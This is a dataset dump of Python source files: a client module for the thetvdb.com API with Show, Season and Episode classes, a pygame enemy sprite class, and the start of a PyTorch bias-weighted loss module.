pytvdbapi.\n#\n# pytvdbapi is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# pytvdbapi is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with pytvdbapi. If not, see .\n\n\"\"\"\nThis is the main module for **pytvdbapi** intended for client usage. It contains functions to access the\nAPI functionality through the :class:`TVDB` class and its methods. It has implementations for\nrepresentations of :class:`Show`, :class:`Season` and :class:`Episode` objects.\n\nIt also contains functionality to access the list of API supported languages through the :func:`languages`\nfunction.\n\nBasic usage::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"How I met your mother\", \"en\")\n >>> len(result)\n 1\n\n >>> show = result[0] # If there is a perfect match, it will be the first\n >>> print(show.SeriesName)\n How I Met Your Mother\n\n >>> len(show) # Show the number of seasons\n 10\n\n >>> for season in show: #doctest: +ELLIPSIS\n ... for episode in season:\n ... print(episode.EpisodeName)\n ...\n Robin Sparkles Music Video - Let's Go to the Mall\n Robin Sparkles Music Video - Sandcastles In the Sand\n ...\n Pilot\n Purple Giraffe\n Sweet Taste of Liberty\n Return of the Shirt\n ...\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport logging\nimport tempfile\nimport os\nfrom collections import Sequence\n\n# pylint: disable=E0611, F0401, W0622\nfrom pytvdbapi.actor import Actor\nfrom pytvdbapi.banner import Banner\nfrom pytvdbapi.utils import InsensitiveDictionary, unicode_arguments\nfrom pytvdbapi._compat import implements_to_string, make_bytes, make_unicode\n\ntry:\n from urllib import quote\nexcept ImportError:\n from urllib.parse import quote\n\n# pylint: enable=E0611, F0401\n\nfrom pytvdbapi import error\nfrom pytvdbapi.__init__ import __NAME__\nfrom pytvdbapi.loader import Loader\nfrom pytvdbapi.mirror import MirrorList, TypeMask\nfrom pytvdbapi.utils import merge\nfrom pytvdbapi.xmlhelpers import parse_xml, generate_tree\n\n# URL templates used for loading the data from thetvdb.com\n__mirrors__ = u\"http://www.thetvdb.com/api/{api_key}/mirrors.xml\"\n__time__ = u\"http://www.thetvdb.com/api/Updates.php?type=none\"\n__search__ = u\"http://www.thetvdb.com/api/GetSeries.php?seriesname={series}&language={language}\"\n__series__ = u\"{mirror}/api/{api_key}/series/{seriesid}/all/{language}.xml\"\n__episode__ = u\"{mirror}/api/{api_key}/episodes/{episodeid}/{language}.xml\"\n__actors__ = u\"{mirror}/api/{api_key}/series/{seriesid}/actors.xml\"\n__banners__ = u\"{mirror}/api/{api_key}/series/{seriesid}/banners.xml\"\n\n__all__ = ['languages', 'Language', 'TVDB', 'Search', 'Show', 'Season', 'Episode']\n\n# Module logger object\nlogger = logging.getLogger(__name__)\n\n\n@implements_to_string\nclass Language(object):\n \"\"\"\n Representing a language that is supported by the API.\n\n .. seealso:: :func:`TVDB.get_series`, :func:`TVDB.get_episode` and :func:`TVDB.search` for functions\n where the language can be specified.\n \"\"\"\n\n def __init__(self, abbrev, name, id):\n #: A two letter abbreviation representing the language, e.g. *en*.\n #: This is what should be passed when specifying a language to the API.\n self.abbreviation = abbrev\n\n #: The localised name of the language.\n self.name = name\n\n self._id = id\n\n def __str__(self):\n return u'<{0} - {1}({2})>'.format(self.__class__.__name__, self.name, self.abbreviation)\n\n def __repr__(self):\n return self.__str__()\n\n# The list of API supported languages\n__LANGUAGES__ = {u\"da\": Language(abbrev=u\"da\", name=u\"Dansk\", id=10),\n u\"fi\": Language(abbrev=u\"fi\", name=u\"Suomeksi\", id=11),\n u\"nl\": Language(abbrev=u\"nl\", name=u\"Nederlands\", id=13),\n u\"de\": Language(abbrev=u\"de\", name=u\"Deutsch\", id=14),\n u\"it\": Language(abbrev=u\"it\", name=u\"Italiano\", id=15),\n u\"es\": Language(abbrev=u\"es\", name=u\"Español\", id=16),\n u\"fr\": Language(abbrev=u\"fr\", name=u\"Français\", id=17),\n u\"pl\": Language(abbrev=u\"pl\", name=u\"Polski\", id=18),\n u\"hu\": Language(abbrev=u\"hu\", name=u\"Magyar\", id=19),\n u\"el\": Language(abbrev=u\"el\", name=u\"Ελληνικά\", id=20),\n u\"tr\": Language(abbrev=u\"tr\", name=u\"Türkçe\", id=21),\n u\"ru\": Language(abbrev=u\"ru\", name=u\"русский язык\", id=22),\n u\"he\": Language(abbrev=u\"he\", name=u\" עברית\", id=24),\n u\"ja\": Language(abbrev=u\"ja\", name=u\"日本語\", id=25),\n u\"pt\": Language(abbrev=u\"pt\", name=u\"Português\", id=26),\n u\"zh\": Language(abbrev=u\"zh\", name=u\"中文\", id=27),\n u\"cs\": Language(abbrev=u\"cs\", name=u\"čeština\", id=28),\n u\"sl\": Language(abbrev=u\"sl\", name=u\"Slovenski\", id=30),\n u\"hr\": Language(abbrev=u\"hr\", name=u\"Hrvatski\", id=31),\n u\"ko\": Language(abbrev=u\"ko\", name=u\"한국어\", id=32),\n u\"en\": Language(abbrev=u\"en\", name=u\"English\", id=7),\n u\"sv\": Language(abbrev=u\"sv\", name=u\"Svenska\", id=8),\n u\"no\": Language(abbrev=u\"no\", name=u\"Norsk\", id=9)}\n\n\ndef languages():\n \"\"\"\n :return: A list of :class:`Language` objects\n\n Returns the list of all API supported languages.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> for language in api.languages(): #doctest: +ELLIPSIS\n ... print(language)\n \n \n \n ...\n \n ...\n \n ...\n \"\"\"\n return sorted([lang for lang in __LANGUAGES__.values()], key=lambda l: l.abbreviation)\n\n\n@implements_to_string\nclass Episode(object):\n \"\"\"\n :raise: :exc:`pytvdbapi.error.TVDBAttributeError`\n\n Holds all information about an individual episode. This should be treated\n as a read-only object to obtain the attributes of the episode.\n\n All episode values returned from thetvdb.com_ are\n accessible as attributes of the episode object.\n TVDBAttributeError will be raised if accessing an invalid attribute. Some\n type conversions of the attributes will take place as follows:\n\n * Strings of the format yyyy-mm-dd will be converted into a\\\n :class:`datetime.date` object.\n * Pipe separated strings will be converted into a list. E.g \"foo | bar\" =>\\\n [\"foo\", \"bar\"]\n * Numbers with a decimal point will be converted to float\n * A number will be converted into an int\n\n\n It is possible to obtain the containing season through the *Episode.season*\n attribute.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"Dexter\", \"en\")\n >>> show = result[0]\n >>> episode = show[1][2] # Get episode S01E02\n\n >>> print(episode.season)\n \n\n >>> print(episode.EpisodeNumber)\n 2\n\n >>> print(episode.EpisodeName)\n Crocodile\n\n >>> episode.FirstAired\n datetime.date(2006, 10, 8)\n\n >>> dir(episode) #doctest: +NORMALIZE_WHITESPACE\n ['Combined_episodenumber',\n 'Combined_season', 'DVD_chapter', 'DVD_discid', 'DVD_episodenumber',\n 'DVD_season', 'Director', 'EpImgFlag', 'EpisodeName', 'EpisodeNumber',\n 'FirstAired', 'GuestStars', 'IMDB_ID', 'Language', 'Overview',\n 'ProductionCode', 'Rating', 'RatingCount', 'SeasonNumber', 'Writer',\n 'absolute_number', 'filename', 'id', 'lastupdated', 'season',\n 'seasonid', 'seriesid', 'thumb_added', 'thumb_height', 'thumb_width']\n\n .. _thetvdb.com: http://thetvdb.com\n \"\"\"\n\n data = {}\n\n def __init__(self, data, season, config):\n self.season, self.config = season, config\n ignore_case = self.config.get('ignore_case', False)\n\n self.data = InsensitiveDictionary(ignore_case=ignore_case, **data) # pylint: disable=W0142\n\n def __getattr__(self, item):\n try:\n return self.data[item]\n except KeyError:\n raise error.TVDBAttributeError(u\"Episode has no attribute {0}\".format(item))\n\n def __dir__(self):\n attributes = [d for d in list(self.__dict__.keys()) if d not in ('data', 'config')]\n return list(self.data.keys()) + attributes\n\n def __str__(self):\n return u'<{0} - S{1:03d}E{2:03d}>'.format(\n self.__class__.__name__, self.SeasonNumber, self.EpisodeNumber)\n\n def __repr__(self):\n return self.__str__()\n\n\n@implements_to_string\nclass Season(Sequence):\n # pylint: disable=R0924\n \"\"\"\n :raise: :exc:`pytvdbapi.error.TVDBIndexError`\n\n Holds all the episodes that belong to a specific season. It is possible\n to iterate over the Season to obtain the individual :class:`Episode`\n instances. It is also possible to obtain an individual episode using the\n [ ] syntax. It will raise :class:`pytvdbapi.error.TVDBIndexError` if trying\n to index an invalid episode index.\n\n It is possible to obtain the containing :class:`Show` instance through the\n *Season.show* attribute.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"Dexter\", \"en\")\n >>> show = result[0]\n\n >>> season = show[2]\n >>> len(season) # Number of episodes in the season\n 12\n\n >>> print(season.season_number)\n 2\n\n >>> print(season[2].EpisodeName)\n Waiting to Exhale\n\n >>> for episode in season: #doctest: +ELLIPSIS\n ... print(episode.EpisodeName)\n ...\n It's Alive!\n Waiting to Exhale\n An Inconvenient Lie\n See-Through\n ...\n Left Turn Ahead\n The British Invasion\n \"\"\"\n\n def __init__(self, season_number, show):\n self.show, self.season_number = show, season_number\n self.episodes = dict()\n\n def __getitem__(self, item):\n if isinstance(item, int):\n try:\n return self.episodes[item]\n except KeyError:\n raise error.TVDBIndexError(u\"Episode {0} not found\".format(item))\n\n elif isinstance(item, slice):\n indices = sorted(self.episodes.keys())[item] # Slice the keys\n return [self[i] for i in indices]\n else:\n raise error.TVDBValueError(u\"Index should be an integer\")\n\n def __dir__(self): # pylint: disable=R0201\n return ['show', 'season_number']\n\n def __reversed__(self):\n for i in sorted(self.episodes.keys(), reverse=True):\n yield self[i]\n\n def __len__(self):\n return len(self.episodes)\n\n def __iter__(self):\n return iter(sorted(list(self.episodes.values()), key=lambda ep: ep.EpisodeNumber))\n\n def __str__(self):\n return u''.format(self.season_number)\n\n def __repr__(self):\n return self.__str__()\n\n def append(self, episode):\n \"\"\"\n :param episode: The episode to append\n :type episode: :class:`Episode`\n\n Adds a new :class:`Episode` to the season. If an episode with the same\n EpisodeNumber already exists, it will be overwritten.\n \"\"\"\n assert type(episode) in (Episode,)\n logger.debug(u\"{0} adding episode {1}\".format(self, episode))\n\n self.episodes[int(episode.EpisodeNumber)] = episode\n\n\n@implements_to_string\nclass Show(Sequence):\n # pylint: disable=R0924, R0902\n \"\"\"\n :raise: :exc:`pytvdbapi.error.TVDBAttributeError`, :exc:`pytvdbapi.error.TVDBIndexError`\n\n Holds attributes about a single show and contains all seasons associated\n with a show. The attributes are named exactly as returned from\n thetvdb.com_. This object should be considered a read only container of\n data provided from the server. Some type conversion of of the attributes\n will take place as follows:\n\n * Strings of the format yyyy-mm-dd will be converted into a\\\n :class:`datetime.date` object.\n * Pipe separated strings will be converted into a list. E.g \"foo | bar\" =>\\\n [\"foo\", \"bar\"]\n * Numbers with a decimal point will be converted to float\n * A number will be converted into an int\n\n\n The Show uses lazy evaluation and will only load the full data set from\n the server when this data is needed. This is to speed up the searches and\n to reduce the workload of the servers. This way,\n data will only be loaded when actually needed.\n\n The Show supports iteration to iterate over the Seasons contained in the\n Show. You can also index individual seasons with the [ ] syntax.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"dexter\", \"en\")\n >>> show = result[0]\n\n >>> dir(show) # List the set of basic attributes # doctest: +NORMALIZE_WHITESPACE\n ['AliasNames', 'FirstAired', 'IMDB_ID', 'Network',\n 'Overview', 'SeriesName', 'actor_objects', 'api',\n 'banner', 'banner_objects', 'id', 'lang', 'language',\n 'seriesid', 'zap2it_id']\n\n >>> show.update() # Load the full data set from the server\n >>> dir(show) # List the full set of attributes # doctest: +NORMALIZE_WHITESPACE\n ['Actors', 'Airs_DayOfWeek', 'Airs_Time', 'AliasNames',\n 'ContentRating', 'FirstAired', 'Genre', 'IMDB_ID', 'Language',\n 'Network', 'NetworkID', 'Overview', 'Rating', 'RatingCount', 'Runtime',\n 'SeriesID', 'SeriesName', 'Status', 'actor_objects', 'added', 'addedBy',\n 'api', 'banner', 'banner_objects', 'fanart', 'id', 'lang', 'language',\n 'lastupdated', 'poster', 'seriesid', 'zap2it_id']\n\n .. note:: When searching, thetvdb.com_ provides a basic set of attributes\n for the show. When the full data set is loaded thetvdb.com_ provides a\n complete set of attributes for the show. The full data set is loaded\n when accessing the season data of the show. If you need access to the\n full set of attributes you can force the loading of the full data set\n by calling the :func:`update()` function.\n\n .. _thetvdb.com: http://thetvdb.com\n \"\"\"\n\n data = {}\n\n def __init__(self, data, api, language, config):\n self.api, self.lang, self.config = api, language, config\n self.seasons = dict()\n\n self.ignore_case = self.config.get('ignore_case', False)\n self.data = InsensitiveDictionary(ignore_case=self.ignore_case, **data) # pylint: disable=W0142\n\n self.data['actor_objects'] = list()\n self.data['banner_objects'] = list()\n\n def __getattr__(self, item):\n try:\n return self.data[item]\n except KeyError:\n raise error.TVDBAttributeError(u\"Show has no attribute named {0}\".format(item))\n\n def __dir__(self):\n attributes = [d for d in list(self.__dict__.keys())\n if d not in ('data', 'config', 'ignore_case', 'seasons')]\n return list(self.data.keys()) + attributes\n\n def __iter__(self):\n if not self.seasons:\n self._populate_data()\n\n return iter(sorted(list(self.seasons.values()), key=lambda season: season.season_number))\n\n def __len__(self):\n if not len(self.seasons):\n self._populate_data()\n\n return len(self.seasons)\n\n def __reversed__(self):\n for i in sorted(self.seasons.keys(), reverse=True):\n yield self[i]\n\n def __getitem__(self, item):\n if len(self.seasons) == 0:\n self._populate_data()\n\n if isinstance(item, int):\n try:\n return self.seasons[item]\n except KeyError:\n raise error.TVDBIndexError(u\"Season {0} not found\".format(item))\n\n elif isinstance(item, slice):\n indices = sorted(self.seasons.keys())[item] # Slice the keys\n return [self[i] for i in indices]\n else:\n raise error.TVDBValueError(u\"Index should be an integer or slice\")\n\n def __str__(self):\n return u'<{0} - {1}>'.format(self.__class__.__name__, self.SeriesName)\n\n def __repr__(self):\n return self.__str__()\n\n def update(self):\n \"\"\"\n Updates the data structure with data from the server.\n \"\"\"\n self._populate_data()\n\n def _populate_data(self):\n \"\"\"\n Populates the Show object with data. This will hit the network to\n download the XML data from `thetvdb.com `_.\n :class:`Season` and `:class:Episode` objects will be created and\n added as needed.\n\n .. Note: This function is not intended to be used by clients of the\n API and should only be used internally by the Show class to manage its\n structure.\n \"\"\"\n logger.debug(u\"Populating season data from URL.\")\n\n context = {'mirror': self.api.mirrors.get_mirror(TypeMask.XML).url,\n 'api_key': self.config['api_key'],\n 'seriesid': self.id,\n 'language': self.lang}\n\n url = __series__.format(**context)\n data = generate_tree(self.api.loader.load(url))\n episodes = [d for d in parse_xml(data, \"Episode\")]\n\n show_data = parse_xml(data, \"Series\")\n assert len(show_data) == 1, u\"Should only have 1 Show section\"\n\n self.data = merge(self.data, InsensitiveDictionary(show_data[0], ignore_case=self.ignore_case))\n\n for episode_data in episodes:\n season_nr = int(episode_data['SeasonNumber'])\n if not season_nr in self.seasons:\n self.seasons[season_nr] = Season(season_nr, self)\n\n episode = Episode(episode_data, self.seasons[season_nr], self.config)\n self.seasons[season_nr].append(episode)\n\n #If requested, load the extra actors data\n if self.config.get('actors', False):\n self.load_actors()\n\n #if requested, load the extra banners data\n if self.config.get('banners', False):\n self.load_banners()\n\n def load_actors(self):\n \"\"\"\n .. versionadded:: 0.4\n\n Loads the extended actor information into a list of :class:`pytvdbapi.actor.Actor` objects.\n They are available through the *actor_objects* attribute of the show.\n\n If you have used the `actors=True` keyword when creating the :class:`TVDB` instance\n the actors will be loaded automatically and there is no need to use this\n function.\n\n .. note::\n The :class:`Show` instance always contain a list of actor names. If\n that is all you need, do not use this function to avoid unnecessary\n network traffic.\n\n .. seealso::\n :class:`TVDB` for information on how to use the *actors* keyword\n argument.\n \"\"\"\n context = {'mirror': self.api.mirrors.get_mirror(TypeMask.XML).url,\n 'api_key': self.config['api_key'],\n 'seriesid': self.id}\n url = __actors__.format(**context)\n\n logger.debug(u'Loading Actors data from {0}'.format(url))\n\n data = generate_tree(self.api.loader.load(url))\n\n mirror = self.api.mirrors.get_mirror(TypeMask.BANNER).url\n\n #generate all the Actor objects\n # pylint: disable=W0201\n self.actor_objects = [Actor(mirror, d, self)\n for d in parse_xml(data, 'Actor')]\n\n def load_banners(self):\n \"\"\"\n .. versionadded:: 0.4\n\n Loads the extended banner information into a list of :class:`pytvdbapi.banner.Banner` objects.\n They are available through the *banner_objects* attribute of the show.\n\n If you have used the `banners=True` keyword when creating the :class:`TVDB` instance the\n banners will be loaded automatically and there is no need to use this\n function.\n\n .. seealso::\n :class:`TVDB` for information on how to use the *banners* keyword\n argument.\n \"\"\"\n context = {'mirror': self.api.mirrors.get_mirror(TypeMask.XML).url,\n 'api_key': self.config['api_key'],\n 'seriesid': self.id}\n\n url = __banners__.format(**context)\n logger.debug(u'Loading Banner data from {0}'.format(url))\n\n data = generate_tree(self.api.loader.load(url))\n mirror = self.api.mirrors.get_mirror(TypeMask.BANNER).url\n\n # pylint: disable=W0201\n self.banner_objects = [Banner(mirror, b, self) for b in parse_xml(data, \"Banner\")]\n\n\nclass Search(object):\n # pylint: disable=R0924\n \"\"\"\n :raise: :exc:`pytvdbapi.error.TVDBIndexError`\n\n A search result returned from calling :func:`TVDB.search()`. It supports\n iterating over the results, and the individual shows matching the search\n can be accessed using the [ ] syntax.\n\n The search will contain 0 or more :class:`Show()` instances matching the\n search.\n\n The shows will be stored in the same order as they are returned from\n `thetvdb.com `_. They state that if there is a\n perfect match to the search, it will be the first element returned.\n\n .. seealso:: :func:`TVDB.search` for an example of how to use the search\n \"\"\"\n\n def __init__(self, result, search, language):\n self._result = result\n\n #: The search term used to generate the search result\n self.search = search\n\n #: The language used to perform the search\n self.language = language\n\n def __len__(self):\n return len(self._result)\n\n def __getitem__(self, item):\n if not isinstance(item, int):\n raise error.TVDBValueError(u\"Index should be an integer\")\n\n try:\n return self._result[item]\n except (IndexError, TypeError):\n raise error.TVDBIndexError(u\"Index out of range ({0})\".format(item))\n\n def __iter__(self):\n return iter(self._result)\n\n\nclass TVDB(object):\n \"\"\"\n :param api_key: The API key to use to communicate with the server\n :param kwargs:\n\n This is the main entry point for the API. The functionality of the API is\n controlled by configuring the keyword arguments. The supported keyword\n arguments are:\n\n * **cache_dir** (default=//pytvdbapi/). Specifies the\n directory to use for caching the server requests.\n\n .. versionadded:: 0.3\n\n * **actors** (default=False) The extended actor information is stored in a\n separate XML file and would require an additional request to the server\n to obtain. To limit the resource usage, the actor information will only\n be loaded when explicitly requested.\n\n .. note:: The :class:`Show()` object always contain a list of actor\n names.\n\n * **banners** (default=False) The extended banner information is stored in a\n separate XML file and would require an additional request to the server\n to obtain. To limit the resource usage, the banner information will only\n be loaded when explicitly requested.\n\n .. versionadded:: 0.4\n\n * **ignore_case** (default=False) If set to True, all attributes on the\n :class:`Show` and :class:`Episode` instances will be accessible in a\n case insensitive manner. If set to False, the default, all\n attributes will be case sensitive and retain the same casing\n as provided by `thetvdb.com `_.\n\n .. deprecated:: 0.4\n\n * **force_lang** (default=False). It is no longer possible to reload the\n language file. Using it will have no affect but will issue a warning in\n the log file.\n \"\"\"\n\n @unicode_arguments\n def __init__(self, api_key, **kwargs):\n self.config = dict()\n\n #cache old searches to avoid hitting the server\n self.search_buffer = dict()\n\n #Store the path to where we are\n self.path = os.path.abspath(os.path.dirname(__file__))\n\n if 'force_lang' in kwargs:\n logger.warning(u\"'force_lang' keyword argument is deprecated as of version 0.4\")\n\n #extract all argument and store for later use\n self.config['api_key'] = api_key\n self.config['cache_dir'] = kwargs.get(\"cache_dir\",\n make_unicode(os.path.join(tempfile.gettempdir(), __NAME__)))\n\n self.config['actors'] = kwargs.get('actors', False)\n self.config['banners'] = kwargs.get('banners', False)\n self.config['ignore_case'] = kwargs.get('ignore_case', False)\n\n #Create the loader object to use\n self.loader = Loader(self.config['cache_dir'])\n\n #Create the list of available mirrors\n tree = generate_tree(self.loader.load(__mirrors__.format(**self.config)))\n self.mirrors = MirrorList(tree)\n\n @unicode_arguments\n def search(self, show, language, cache=True):\n \"\"\"\n :param show: The show name to search for\n :param language: The language abbreviation to search for. E.g. \"en\"\n :param cache: If False, the local cache will not be used and the\n resources will be reloaded from server.\n :return: A :class:`Search()` instance\n :raise: :exc:`pytvdbapi.error.TVDBValueError`\n\n Searches the server for a show with the provided show name in the\n provided language. The language should be one of the supported\n language abbreviations or it could be set to *all* to search all\n languages. It will raise :class:`pytvdbapi.error.TVDBValueError` if\n an invalid language is provided.\n\n Searches are always cached within a session to make subsequent\n searches with the same parameters fast. If *cache*\n is set to True searches will also be cached across sessions,\n this is recommended to increase speed and to reduce the workload of\n the servers.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> result = db.search(\"House\", \"en\")\n\n >>> print(result[0])\n \n\n >>> for show in result:\n ... print(show) # doctest: +ELLIPSIS\n \n ...\n \n ...\n \"\"\"\n\n logger.debug(u\"Searching for {0} using language {1}\".format(show, language))\n\n if language != u'all' and language not in __LANGUAGES__:\n raise error.TVDBValueError(u\"{0} is not a valid language\".format(language))\n\n if (show, language) not in self.search_buffer or not cache:\n context = {'series': quote(make_bytes(show)), \"language\": language}\n data = generate_tree(self.loader.load(__search__.format(**context), cache))\n shows = [Show(d, self, language, self.config) for d in parse_xml(data, \"Series\")]\n\n self.search_buffer[(show, language)] = shows\n\n return Search(self.search_buffer[(show, language)], show, language)\n\n @unicode_arguments\n def get(self, series_id, language, cache=True):\n \"\"\"\n .. versionadded:: 0.3\n .. deprecated:: 0.4 Use :func:`get_series` instead.\n\n :param series_id: The Show Id to fetch\n :param language: The language abbreviation to search for. E.g. \"en\"\n :param cache: If False, the local cache will not be used and the\n resources will be reloaded from server.\n\n :return: A :class:`Show()` instance\n :raise: :exc:`pytvdbapi.error.TVDBValueError`, :exc:`pytvdbapi.error.TVDBIdError`\n \"\"\"\n\n logger.warning(u\"Using deprecated function 'get'. Use 'get_series' instead\")\n return self.get_series(series_id, language, cache)\n\n @unicode_arguments\n def get_series(self, series_id, language, cache=True):\n \"\"\"\n .. versionadded:: 0.4\n\n :param series_id: The Show Id to fetch\n :param language: The language abbreviation to search for. E.g. \"en\"\n :param cache: If False, the local cache will not be used and the\n resources will be reloaded from server.\n\n :return: A :class:`Show()` instance\n :raise: :exc:`pytvdbapi.error.TVDBValueError`, :exc:`pytvdbapi.error.TVDBIdError`\n\n Provided a valid Show ID, the data for the show is fetched and a\n corresponding :class:`Show()` object is returned.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> show = db.get_series( 79349, \"en\" ) # Load Dexter\n >>> print(show.SeriesName)\n Dexter\n \"\"\"\n\n logger.debug(u\"Getting series with id {0} with language {1}\".format(series_id, language))\n\n if language != 'all' and language not in __LANGUAGES__:\n raise error.TVDBValueError(u\"{0} is not a valid language\".format(language))\n\n context = {'seriesid': series_id, \"language\": language,\n 'mirror': self.mirrors.get_mirror(TypeMask.XML).url,\n 'api_key': self.config['api_key']}\n\n url = __series__.format(**context)\n logger.debug(u'Getting series from {0}'.format(url))\n\n try:\n data = self.loader.load(url, cache)\n except error.TVDBNotFoundError:\n raise error.TVDBIdError(u\"Series id {0} not found\".format(series_id))\n\n if data.strip():\n data = generate_tree(data)\n else:\n raise error.BadData(\"Bad data received\")\n\n series = parse_xml(data, \"Series\")\n\n if len(series) == 0:\n raise error.BadData(\"Bad data received\")\n else:\n return Show(series[0], self, language, self.config)\n\n @unicode_arguments\n def get_episode(self, episode_id, language, cache=True):\n \"\"\"\n .. versionadded:: 0.4\n\n :param episode_id: The Episode Id to fetch\n :param language: The language abbreviation to search for. E.g. \"en\"\n :param cache: If False, the local cache will not be used and the\n resources will be reloaded from server.\n\n :return: An :class:`Episode()` instance\n :raise: :exc:`pytvdbapi.error.TVDBIdError` if no episode is found with the given Id\n\n\n Given a valid episode Id the corresponding episode data is fetched and\n the :class:`Episode()` instance is returned.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> episode = db.get_episode(308834, \"en\") # Load an episode of dexter\n >>> print(episode.id)\n 308834\n\n >>> print(episode.EpisodeName)\n Crocodile\n\n .. Note:: When the :class:`Episode()` is loaded using :func:`get_episode()`\n the *season* attribute used to link the episode with a season will be None.\n \"\"\"\n\n logger.debug(u\"Getting episode with id {0} with language {1}\".format(episode_id, language))\n\n if language != 'all' and language not in __LANGUAGES__:\n raise error.TVDBValueError(u\"{0} is not a valid language\".format(language))\n\n context = {'episodeid': episode_id, \"language\": language,\n 'mirror': self.mirrors.get_mirror(TypeMask.XML).url,\n 'api_key': self.config['api_key']}\n\n url = __episode__.format(**context)\n logger.debug(u'Getting episode from {0}'.format(url))\n\n try:\n data = self.loader.load(url, cache)\n except error.TVDBNotFoundError:\n raise error.TVDBIdError(u\"No Episode with id {0} found\".format(episode_id))\n\n if data.strip():\n data = generate_tree(data)\n else:\n raise error.BadData(\"Bad data received\")\n\n episodes = parse_xml(data, \"Episode\")\n\n if len(episodes) == 0:\n raise error.BadData(\"Bad data received\")\n else:\n return Episode(episodes[0], None, self.config)\n","sub_path":"Contents/Libraries/Shared/pytvdbapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":32598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"366946798","text":"import time\nfrom random import choice\n\nimport pygame\n\n\nclass Enemy:\n animation_enemy = ['./img/enemy/first_enemy/enemy_start.png',\n './img/enemy/first_enemy/enemy_stand.png',\n './img/enemy/first_enemy/enemy_move.png']\n\n image = pygame.image.load(animation_enemy[0])\n type = 'Enemy'\n\n def __init__(self, x=100, y=125):\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.speed = 0\n self.direction = None\n self.can_move_Right = True\n self.can_move_Left = True\n self.can_move_Up = True\n self.can_move_Down = True\n self.directions = ['Up', 'Left', 'Right', 'Down']\n self.choose_direction()\n # for animation\n self.start_anim_time = None\n self.num_sprite = 0\n\n def choose_direction(self):\n data = []\n if self.can_move_Left:\n data.append('Left')\n if self.can_move_Right:\n data.append('Right')\n if self.can_move_Up:\n data.append('Up')\n if self.can_move_Down:\n data.append('Down')\n if len(data) == 0:\n data = ['Right', 'Left', 'Up', 'Down']\n self.can_move_Right = True\n self.can_move_Left = True\n self.can_move_Up = True\n self.can_move_Down = True\n self.direction = choice(data)\n\n def prepare_for_anim(self):\n if self.start_anim_time is None:\n self.start_anim_time = time.time()\n self.num_sprite = 0\n elif self.start_anim_time is not None:\n if time.time() - self.start_anim_time > 0.3:\n self.start_anim_time = time.time()\n self.num_sprite = (self.num_sprite + 1) % 2\n\n def dancing(self):\n self.prepare_for_anim()\n self.image = pygame.image.load(self.animation_enemy[self.num_sprite])\n\n def process_move(self):\n if not self.can_move_Up and not self.can_move_Right and not self.can_move_Left and not self.can_move_Down:\n return\n if self.direction == 'Right':\n self.rect.move_ip(self.speed, 0)\n if self.direction == 'Left':\n self.rect.move_ip(-self.speed, 0)\n if self.direction == 'Up':\n self.rect.move_ip(0, -self.speed)\n if self.direction == 'Down':\n self.rect.move_ip(0, self.speed)\n\n def process_logic(self, objects):\n while self.process_collision(objects):\n self.choose_direction()\n self.process_move()\n self.dancing()\n\n def process_draw(self, screen, camera):\n screen.blit(self.image, camera.apply(self))\n\n def detect_collision_right(self, object):\n if self.direction == 'Right' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x + self.speed, self.rect.y)):\n return True\n return False\n\n def detect_collision_left(self, object):\n if self.direction == 'Left' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x - self.speed, self.rect.y)):\n return True\n return False\n\n def detect_collision_down(self, object):\n if self.direction == 'Down' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x, self.rect.y + self.speed)):\n return True\n return False\n\n def detect_collision_up(self, object):\n if self.direction == 'Up' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x, self.rect.y - self.speed)):\n return True\n return False\n\n def process_collision(self, objects):\n for object in objects:\n if self.detect_collision_down(object):\n self.can_move_Down = False\n return True\n if self.detect_collision_up(object):\n self.can_move_Up = False\n return True\n if self.detect_collision_right(object):\n self.can_move_Right = False\n return True\n if self.detect_collision_left(object):\n self.can_move_Left = False\n return True\n return False\n","sub_path":"src/charachters/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"482222038","text":"from torch import nn\nimport torch\n\nGLOBAL_MIN = 100000\n\n\nclass BiasLoss(nn.Module):\n def __init__(self, alpha=0.3, beta=0.3):\n super(BiasLoss, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.ce = nn.CrossEntropyLoss(reduction='none')\n\n\n def normalise(self, tensor):\n min = tensor.clone().min()\n\n max = tensor.clone().max()\n global GLOBAL_MIN\n if min < GLOBAL_MIN:\n GLOBAL_MIN = min\n normalised = ((tensor - GLOBAL_MIN) / (max - min))\n return normalised\n\n def forward(self, features, output, target):\n features_copy = features.clone().detach()\n features_per_sample = features_copy.reshape(features_copy.shape[0], -1)\n\n variance_per_sample = (torch.var(features_per_sample, dim=1))\n variance_per_sample_normalised = self.normalise(variance_per_sample)\n\n weights = ((torch.exp(variance_per_sample_normalised * self.beta) - 1.) / 1.) + self.alpha\n 